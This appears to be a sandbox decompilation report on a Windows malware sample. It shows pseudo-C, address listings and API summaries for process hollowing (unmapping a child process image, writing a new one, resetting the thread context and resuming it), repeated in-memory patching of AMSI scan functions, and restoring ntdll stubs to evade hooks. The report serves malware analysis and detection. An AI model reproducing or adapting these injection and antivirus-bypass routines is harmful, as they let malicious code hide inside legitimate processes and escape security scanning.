                                                                                                  							 *(_t1330 + 0x34) = _t1798;
                                                                                                  							_push(0);
                                                                                                  							_push(_t1841);
                                                                                                  							_t1332 =  *0x28a651c; // 0x7ebd0018
                                                                                                  							_t305 = _t1332 + 0x3c; // 0x110
                                                                                                  							asm("cdq");
                                                                                                  							asm("adc edx, [esp+0x4]");
                                                                                                  							_t1800 =  *0x28a6520; // 0x7ebd0128
                                                                                                  							E02869B1C( *_t305 + _v448, 0xf8, _t1800);
                                                                                                  						}
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v592, E02854964(_v596));
                                                                                                  						_push(_v592);
                                                                                                  						E028547B0( &_v604,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v600, E02854964(_v604));
                                                                                                  						_pop(_t1661); // executed
                                                                                                  						E02867B80(_v600, _t1661); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanString");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v608, E02854964(_v612));
                                                                                                  						_push(_v608);
                                                                                                  						E028547B0( &_v620,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v616, E02854964(_v620));
                                                                                                  						_pop(_t1666); // executed
                                                                                                  						E02867B80(_v616, _t1666); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v624, E02854964(_v628));
                                                                                                  						_push(_v624);
                                                                                                  						E028547B0( &_v636,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v632, E02854964(_v636));
                                                                                                  						_pop(_t1671); // executed
                                                                                                  						E02867B80(_v632, _t1671); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v640, E02854964(_v644));
                                                                                                  						_push(_v640);
                                                                                                  						E028547B0( &_v652,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v648, E02854964(_v652));
                                                                                                  						_pop(_t1676); // executed
                                                                                                  						E02867B80(_v648, _t1676); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v656, E02854964(_v660));
                                                                                                  						_push(_v656);
                                                                                                  						E028547B0( &_v668,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v664, E02854964(_v668));
                                                                                                  						_pop(_t1681); // executed
                                                                                                  						E02867B80(_v664, _t1681); // executed
                                                                                                  						_t990 =  *0x28a6520; // 0x7ebd0128
                                                                                                  						_t346 = _t990 + 0x50; // 0x81000
                                                                                                  						_t992 =  *0x28a6528; // 0x400000
                                                                                                  						_t993 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  						NtWriteVirtualMemory(_t993, _t992, _t1841,  *_t346, 0x28a652c);
                                                                                                  						_t995 =  *0x28a6520; // 0x7ebd0128
                                                                                                  						_t347 = _t995 + 0x50; // 0x81000
                                                                                                  						_push( *_t347);
                                                                                                  						_t997 =  *0x28a6528; // 0x400000
                                                                                                  						_push(_t997);
                                                                                                  						_t998 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  						_push(_t998);
                                                                                                  						L028679A4();
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v672, E02854964(_v676));
                                                                                                  						_push(_v672);
                                                                                                  						E028547B0( &_v684,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v680, E02854964(_v684));
                                                                                                  						_pop(_t1686); // executed
                                                                                                  						E02867B80(_v680, _t1686); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanString");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v688, E02854964(_v692));
                                                                                                  						_push(_v688);
                                                                                                  						E028547B0( &_v700,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v696, E02854964(_v700));
                                                                                                  						_pop(_t1691); // executed
                                                                                                  						E02867B80(_v696, _t1691); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v704, E02854964(_v708));
                                                                                                  						_push(_v704);
                                                                                                  						E028547B0( &_v716,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v712, E02854964(_v716));
                                                                                                  						_pop(_t1696); // executed
                                                                                                  						E02867B80(_v712, _t1696); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v720, E02854964(_v724));
                                                                                                  						_push(_v720);
                                                                                                  						E028547B0( &_v732,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v728, E02854964(_v732));
                                                                                                  						_pop(_t1701); // executed
                                                                                                  						E02867B80(_v728, _t1701); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v736, E02854964(_v740));
                                                                                                  						_push(_v736);
                                                                                                  						E028547B0( &_v748,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v744, E02854964(_v748));
                                                                                                  						_pop(_t1706); // executed
                                                                                                  						E02867B80(_v744, _t1706); // executed
                                                                                                  						_t1069 =  *0x28a64f4; // 0x31c000
                                                                                                  						_t1071 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  						NtWriteVirtualMemory(_t1071, _t1069 + 8, 0x28a6528, 4, 0x28a652c); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v752, E02854964(_v756));
                                                                                                  						_push(_v752);
                                                                                                  						E028547B0( &_v764,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v760, E02854964(_v764));
                                                                                                  						_pop(_t1711); // executed
                                                                                                  						E02867B80(_v760, _t1711); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanString");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v768, E02854964(_v772));
                                                                                                  						_push(_v768);
                                                                                                  						E028547B0( &_v780,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v776, E02854964(_v780));
                                                                                                  						_pop(_t1716); // executed
                                                                                                  						E02867B80(_v776, _t1716); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v784, E02854964(_v788));
                                                                                                  						_push(_v784);
                                                                                                  						E028547B0( &_v796,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v792, E02854964(_v796));
                                                                                                  						_pop(_t1721); // executed
                                                                                                  						E02867B80(_v792, _t1721); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v800, E02854964(_v804));
                                                                                                  						_push(_v800);
                                                                                                  						E028547B0( &_v812,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v808, E02854964(_v812));
                                                                                                  						_pop(_t1726); // executed
                                                                                                  						E02867B80(_v808, _t1726); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v816, E02854964(_v820));
                                                                                                  						_push(_v816);
                                                                                                  						E028547B0( &_v828,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v824, E02854964(_v828));
                                                                                                  						_pop(_t1731); // executed
                                                                                                  						E02867B80(_v824, _t1731);
                                                                                                  						_t1143 =  *0x28a6520; // 0x7ebd0128
                                                                                                  						_t428 = _t1143 + 0x28; // 0x3440d
                                                                                                  						 *0x28a6500 =  *_t428 +  *0x28a6528;
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v832, E02854964(_v836));
                                                                                                  						_push(_v832);
                                                                                                  						E028547B0( &_v844,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v840, E02854964(_v844));
                                                                                                  						_pop(_t1736); // executed
                                                                                                  						E02867B80(_v840, _t1736); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v848, E02854964(_v852));
                                                                                                  						_push(_v848);
                                                                                                  						E028547B0( &_v860,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v856, E02854964(_v860));
                                                                                                  						_pop(_t1741); // executed
                                                                                                  						E02867B80(_v856, _t1741); // executed
                                                                                                  						_t1174 =  *0x28a6400; // 0x8bc
                                                                                                  						SetThreadContext(_t1174, 0x28a6450); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v864, E02854964(_v868));
                                                                                                  						_push(_v864);
                                                                                                  						E028547B0( &_v876,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v872, E02854964(_v876));
                                                                                                  						_pop(_t1746); // executed
                                                                                                  						E02867B80(_v872, _t1746); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanString");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v880, E02854964(_v884));
                                                                                                  						_push(_v880);
                                                                                                  						E028547B0( &_v892,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v888, E02854964(_v892));
                                                                                                  						_pop(_t1751); // executed
                                                                                                  						E02867B80(_v888, _t1751); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v896, E02854964(_v900));
                                                                                                  						_push(_v896);
                                                                                                  						E028547B0( &_v908,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v904, E02854964(_v908));
                                                                                                  						_pop(_t1756); // executed
                                                                                                  						E02867B80(_v904, _t1756); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v912, E02854964(_v916));
                                                                                                  						_push(_v912);
                                                                                                  						E028547B0( &_v924,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v920, E02854964(_v924));
                                                                                                  						_pop(_t1761); // executed
                                                                                                  						E02867B80(_v920, _t1761); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v928, E02854964(_v932));
                                                                                                  						_push(_v928);
                                                                                                  						E028547B0( &_v940,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v936, E02854964(_v940));
                                                                                                  						_pop(_t1766); // executed
                                                                                                  						E02867B80(_v936, _t1766); // executed
                                                                                                  						_t1246 =  *0x28a6400; // 0x8bc
                                                                                                  						NtResumeThread(_t1246, 0);
                                                                                                  						E02852C2C(_t1841);
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v944, E02854964(_v948));
                                                                                                  						_push(_v944);
                                                                                                  						E028547B0( &_v956,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v952, E02854964(_v956));
                                                                                                  						_pop(_t1772); // executed
                                                                                                  						E02867B80(_v952, _t1772); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v960, E02854964(_v964));
                                                                                                  						_push(_v960);
                                                                                                  						E028547B0( &_v972,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v968, E02854964(_v972));
                                                                                                  						_pop(_t1777); // executed
                                                                                                  						E02867B80(_v968, _t1777); // executed
                                                                                                  						_t1279 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  						E02867B24(_t1279, "NtOpenProcess");
                                                                                                  						_t1281 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  						E02867B24(_t1281, "NtReadVirtualMemory");
                                                                                                  						_t1283 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  						E02867B24(_t1283, "NtSetSecurityObject");
                                                                                                  					}
                                                                                                  				}
                                                                                                  				goto L17;
                                                                                                  			}
                                                                                                  0x0286ba6a
                                                                                                  0x0286ba6a
                                                                                                  0x02869f98
                                                                                                  0x02869f99
                                                                                                  0x02869f9a
                                                                                                  0x02869f9f
                                                                                                  0x02869fa2
                                                                                                  0x02869fa6
                                                                                                  0x02869fad
                                                                                                  0x02869fb2
                                                                                                  0x02869fbd
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x02869fc3
                                                                                                  0x02869fc8
                                                                                                  0x02869fca
                                                                                                  0x02869fd7
                                                                                                  0x02869fe9
                                                                                                  0x02869ff1
                                                                                                  0x02869ffc
                                                                                                  0x0286a00e
                                                                                                  0x0286a016
                                                                                                  0x0286a017
                                                                                                  0x0286a01c
                                                                                                  0x0286a021
                                                                                                  0x0286a023
                                                                                                  0x0286a030
                                                                                                  0x0286a042
                                                                                                  0x0286a04a
                                                                                                  0x0286a058
                                                                                                  0x0286a06d
                                                                                                  0x0286a075
                                                                                                  0x0286a076
                                                                                                  0x0286a07b
                                                                                                  0x0286a080
                                                                                                  0x0286a082
                                                                                                  0x0286a092
                                                                                                  0x0286a0aa
                                                                                                  0x0286a0b5
                                                                                                  0x0286a0c3
                                                                                                  0x0286a0db
                                                                                                  0x0286a0e6
                                                                                                  0x0286a0e7
                                                                                                  0x0286a0ec
                                                                                                  0x0286a0f1
                                                                                                  0x0286a0f3
                                                                                                  0x0286a103
                                                                                                  0x0286a11b
                                                                                                  0x0286a126
                                                                                                  0x0286a134
                                                                                                  0x0286a14c
                                                                                                  0x0286a157
                                                                                                  0x0286a158
                                                                                                  0x0286a17c
                                                                                                  0x0286a187
                                                                                                  0x0286a18f
                                                                                                  0x0286a195
                                                                                                  0x0286a19c
                                                                                                  0x0286a19e
                                                                                                  0x0286a1a3
                                                                                                  0x0286a1a5
                                                                                                  0x0286a1b5
                                                                                                  0x0286a1cd
                                                                                                  0x0286a1d8
                                                                                                  0x0286a1e6
                                                                                                  0x0286a1fe
                                                                                                  0x0286a209
                                                                                                  0x0286a20a
                                                                                                  0x0286a20a
                                                                                                  0x0286a20f
                                                                                                  0x0286a214
                                                                                                  0x0286a216
                                                                                                  0x0286a226
                                                                                                  0x0286a23e
                                                                                                  0x0286a249
                                                                                                  0x0286a257
                                                                                                  0x0286a26f
                                                                                                  0x0286a27a
                                                                                                  0x0286a27b
                                                                                                  0x0286a280
                                                                                                  0x0286a285
                                                                                                  0x0286a287
                                                                                                  0x0286a297
                                                                                                  0x0286a2af
                                                                                                  0x0286a2ba
                                                                                                  0x0286a2c8
                                                                                                  0x0286a2e0
                                                                                                  0x0286a2eb
                                                                                                  0x0286a2ec
                                                                                                  0x0286a2f5
                                                                                                  0x0286a301
                                                                                                  0x0286a306
                                                                                                  0x0286a30b
                                                                                                  0x0286a30d
                                                                                                  0x0286a31d
                                                                                                  0x0286a335
                                                                                                  0x0286a340
                                                                                                  0x0286a34e
                                                                                                  0x0286a366
                                                                                                  0x0286a371
                                                                                                  0x0286a372
                                                                                                  0x0286a377
                                                                                                  0x0286a37c
                                                                                                  0x0286a37e
                                                                                                  0x0286a38e
                                                                                                  0x0286a3a6
                                                                                                  0x0286a3b1
                                                                                                  0x0286a3bf
                                                                                                  0x0286a3d7
                                                                                                  0x0286a3e2
                                                                                                  0x0286a3e3
                                                                                                  0x0286a3e8
                                                                                                  0x0286a3ed
                                                                                                  0x0286a3ef
                                                                                                  0x0286a3ff
                                                                                                  0x0286a417
                                                                                                  0x0286a422
                                                                                                  0x0286a430
                                                                                                  0x0286a448
                                                                                                  0x0286a453
                                                                                                  0x0286a454
                                                                                                  0x0286a463
                                                                                                  0x0286a46e
                                                                                                  0x0286a474
                                                                                                  0x0286a479
                                                                                                  0x0286a47e
                                                                                                  0x0286a480
                                                                                                  0x0286a490
                                                                                                  0x0286a4a8
                                                                                                  0x0286a4b3
                                                                                                  0x0286a4c1
                                                                                                  0x0286a4d9
                                                                                                  0x0286a4e4
                                                                                                  0x0286a4e5
                                                                                                  0x0286a4ea
                                                                                                  0x0286a4ef
                                                                                                  0x0286a4f1
                                                                                                  0x0286a501
                                                                                                  0x0286a519
                                                                                                  0x0286a524
                                                                                                  0x0286a532
                                                                                                  0x0286a54a
                                                                                                  0x0286a555
                                                                                                  0x0286a556
                                                                                                  0x0286a55b
                                                                                                  0x0286a560
                                                                                                  0x0286a562
                                                                                                  0x0286a572
                                                                                                  0x0286a58a
                                                                                                  0x0286a595
                                                                                                  0x0286a5a3
                                                                                                  0x0286a5bb
                                                                                                  0x0286a5c6
                                                                                                  0x0286a5c7
                                                                                                  0x0286a5cc
                                                                                                  0x0286a5db
                                                                                                  0x0286a5e1
                                                                                                  0x0286a5e8
                                                                                                  0x0286a5ee
                                                                                                  0x0286a5f3
                                                                                                  0x0286a5f5
                                                                                                  0x0286a605
                                                                                                  0x0286a61d
                                                                                                  0x0286a628
                                                                                                  0x0286a636
                                                                                                  0x0286a64e
                                                                                                  0x0286a659
                                                                                                  0x0286a65a
                                                                                                  0x0286a65f
                                                                                                  0x0286a664
                                                                                                  0x0286a666
                                                                                                  0x0286a676
                                                                                                  0x0286a68e
                                                                                                  0x0286a699
                                                                                                  0x0286a6a7
                                                                                                  0x0286a6bf
                                                                                                  0x0286a6ca
                                                                                                  0x0286a6cb
                                                                                                  0x0286a6dc
                                                                                                  0x0286a6e5
                                                                                                  0x0286a6eb
                                                                                                  0x0286a6f0
                                                                                                  0x0286a6f5
                                                                                                  0x0286a6f8
                                                                                                  0x0286a6fe
                                                                                                  0x0286aa11
                                                                                                  0x0286aa16
                                                                                                  0x0286aa18
                                                                                                  0x0286aa28
                                                                                                  0x0286aa40
                                                                                                  0x0286aa4b
                                                                                                  0x0286aa59
                                                                                                  0x0286aa71
                                                                                                  0x0286aa7c
                                                                                                  0x0286aa7d
                                                                                                  0x0286a704
                                                                                                  0x0286a704
                                                                                                  0x0286a709
                                                                                                  0x0286a70b
                                                                                                  0x0286a71b
                                                                                                  0x0286a733
                                                                                                  0x0286a73e
                                                                                                  0x0286a74c
                                                                                                  0x0286a764
                                                                                                  0x0286a76f
                                                                                                  0x0286a770
                                                                                                  0x0286a775
                                                                                                  0x0286a77a
                                                                                                  0x0286a77c
                                                                                                  0x0286a78c
                                                                                                  0x0286a7a4
                                                                                                  0x0286a7af
                                                                                                  0x0286a7bd
                                                                                                  0x0286a7d5
                                                                                                  0x0286a7e0
                                                                                                  0x0286a7e1
                                                                                                  0x0286a7e6
                                                                                                  0x0286a7eb
                                                                                                  0x0286a7ed
                                                                                                  0x0286a7fd
                                                                                                  0x0286a815
                                                                                                  0x0286a820
                                                                                                  0x0286a82e
                                                                                                  0x0286a846
                                                                                                  0x0286a851
                                                                                                  0x0286a852
                                                                                                  0x0286a857
                                                                                                  0x0286a85c
                                                                                                  0x0286a860
                                                                                                  0x0286a866
                                                                                                  0x0286a86d
                                                                                                  0x0286a89a
                                                                                                  0x0286a89f
                                                                                                  0x0286a8a1
                                                                                                  0x0286a8b1
                                                                                                  0x0286a8c9
                                                                                                  0x0286a8d4
                                                                                                  0x0286a8e2
                                                                                                  0x0286a8fa
                                                                                                  0x0286a905
                                                                                                  0x0286a906
                                                                                                  0x0286a86f
                                                                                                  0x0286a876
                                                                                                  0x0286a87b
                                                                                                  0x0286a87f
                                                                                                  0x0286a884
                                                                                                  0x0286a888
                                                                                                  0x0286a88e
                                                                                                  0x0286a893
                                                                                                  0x0286a893
                                                                                                  0x0286a90b
                                                                                                  0x0286a910
                                                                                                  0x0286a912
                                                                                                  0x0286a922
                                                                                                  0x0286a93a
                                                                                                  0x0286a945
                                                                                                  0x0286b723
                                                                                                  0x0286b725
                                                                                                  0x0286b735
                                                                                                  0x0286b74d
                                                                                                  0x0286b758
                                                                                                  0x0286b766
                                                                                                  0x0286b77e
                                                                                                  0x0286b789
                                                                                                  0x0286b78a
                                                                                                  0x0286b78f
                                                                                                  0x0286b794
                                                                                                  0x0286b796
                                                                                                  0x0286b7a6
                                                                                                  0x0286b7be
                                                                                                  0x0286b7c9
                                                                                                  0x0286b7d7
                                                                                                  0x0286b7ef
                                                                                                  0x0286b7fa
                                                                                                  0x0286b7fb
                                                                                                  0x0286b800
                                                                                                  0x0286b805
                                                                                                  0x0286b807
                                                                                                  0x0286b817
                                                                                                  0x0286b82f
                                                                                                  0x0286b83a
                                                                                                  0x0286b848
                                                                                                  0x0286b860
                                                                                                  0x0286b86b
                                                                                                  0x0286b86c
                                                                                                  0x0286b871
                                                                                                  0x0286b876
                                                                                                  0x0286b878
                                                                                                  0x0286b888
                                                                                                  0x0286b8a0
                                                                                                  0x0286b8ab
                                                                                                  0x0286b8b9
                                                                                                  0x0286b8d1
                                                                                                  0x0286b8dc
                                                                                                  0x0286b8dd
                                                                                                  0x0286b8e4
                                                                                                  0x0286b8ea
                                                                                                  0x0286b8f9
                                                                                                  0x0286b904
                                                                                                  0x0286b909
                                                                                                  0x0286b90b
                                                                                                  0x0286b91b
                                                                                                  0x0286b933
                                                                                                  0x0286b93e
                                                                                                  0x0286b94c
                                                                                                  0x0286b964
                                                                                                  0x0286b96f
                                                                                                  0x0286b970
                                                                                                  0x0286b975
                                                                                                  0x0286b97a
                                                                                                  0x0286b97c
                                                                                                  0x0286b98c
                                                                                                  0x0286b9a4
                                                                                                  0x0286b9af
                                                                                                  0x0286b9bd
                                                                                                  0x0286b9d5
                                                                                                  0x0286b9e0
                                                                                                  0x0286b9e1
                                                                                                  0x0286b9f0
                                                                                                  0x0286b9f5
                                                                                                  0x0286ba04
                                                                                                  0x0286ba09
                                                                                                  0x0286ba18
                                                                                                  0x0286ba1d
                                                                                                  0x0286ba1d
                                                                                                  0x0286ace7
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                    • Part of subcall function 02867B80: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
                                                                                                    • Part of subcall function 02867B80: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
                                                                                                    • Part of subcall function 02867B80: GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
                                                                                                    • Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
                                                                                                    • Part of subcall function 02867B80: VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
                                                                                                    • Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
                                                                                                    • Part of subcall function 02867B80: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
                                                                                                    • Part of subcall function 02867B80: FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B
                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,028A640C,028A63FC,ScanString,028A63D4,0286BA90,Initialize,028A63D4), ref: 0286A195
                                                                                                  • NtCreateProcess.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,001F0FFF,028A6324,00000000,00000001,00000000,00000000,00000000,OpenSession,028A63D4,0286BA90,ScanString,028A63D4,0286BA90,UacInitialize,028A63D4), ref: 0286A474
                                                                                                  • GetThreadContext.KERNEL32(000008BC,028A6450,OpenSession,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,000008B8,001F0FFF,028A6324,00000000,00000001), ref: 0286A5E1
                                                                                                  • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,0031BFF8,028A6524,00000004,028A652C,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,000008BC,028A6450,OpenSession,028A63D4,0286BA90), ref: 0286A6EB
                                                                                                  • NtUnmapViewOfSection.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,00400000,OpenSession,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,000008B8,0031BFF8,028A6524,00000004,028A652C), ref: 0286A866
                                                                                                    • Part of subcall function 028679CC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679D9
                                                                                                    • Part of subcall function 028679CC: GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679DF
                                                                                                    • Part of subcall function 028679CC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028679FF
                                                                                                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,00400000,00000000,00081000,028A652C,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,OpenSession,028A63D4,0286BA90,ScanString,028A63D4), ref: 0286B0FF
                                                                                                  • NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,00400000,00081000,000008B8,00400000,00000000,00081000,028A652C,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,OpenSession,028A63D4), ref: 0286B119
                                                                                                  • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,0031BFF8,028A6528,00000004,028A652C,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,OpenSession,028A63D4,0286BA90,ScanString,028A63D4), ref: 0286B36E
                                                                                                  • SetThreadContext.KERNEL32(000008BC,028A6450,OpenSession,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,OpenSession,028A63D4), ref: 0286B6A8
                                                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008BC,00000000,OpenSession,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,ScanString,028A63D4,0286BA90,UacInitialize,028A63D4), ref: 0286B8EA
                                                                                                    • Part of subcall function 02867B24: LoadLibraryA.KERNEL32(ntdll), ref: 02867B36
                                                                                                    • Part of subcall function 02867B24: GetProcAddress.KERNEL32(00000000,NtOpenProcess), ref: 02867B43
                                                                                                    • Part of subcall function 02867B24: WriteProcessMemory.KERNEL32(00000000,00000000,?,00000001,?,00000000,NtOpenProcess,ntdll), ref: 02867B5C
                                                                                                    • Part of subcall function 02867B24: FreeLibrary.KERNEL32(00000000,00000000,NtOpenProcess,ntdll), ref: 02867B6F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryVirtual$Process$LibraryWrite$AddressProcThread$ContextCreateCurrentFreeHandleLoadModule$AllocateCacheFlushInstructionProtectReadResumeSectionUnmapUserView
                                                                                                  • String ID: Initialize$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$ntdll
                                                                                                  • API String ID: 3077615847-3811953699
                                                                                                  • Opcode ID: 579f232d8670217a7c16867b5ba8d6309b06c6190183eddfbf5260425c0f0363
